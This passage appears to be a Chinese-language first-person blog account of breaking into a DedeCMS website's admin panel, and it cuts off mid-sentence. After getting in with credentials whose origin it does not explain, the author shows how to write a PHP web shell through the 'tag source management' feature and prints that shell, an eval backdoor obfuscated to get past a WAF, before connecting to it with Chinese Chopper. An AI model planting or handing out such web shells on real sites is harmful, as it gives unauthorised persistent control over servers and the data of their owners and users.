一系列故事的开端:
这是搜到的一个Dede站点的后台
路径为/dede
获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器
不过管理员也不是等闲之辈,早已卸载该模块
于是,我找到了另一处可以生成PHP文件的地方
在”标签源码管理“这里可以创建PHP脚本文件
去掉默认的代码,写入eval代码,点击保存,文件会存放在 /include/taglib 目录下
注:由于服务器有WAF,PHP脚本进行了简单的混淆
<?php
$a='b';
$b=$_POST['x'];
eval($$a);
?>
于是菜刀连接之:
刚开始看到其他站点目录无权限时,并没有想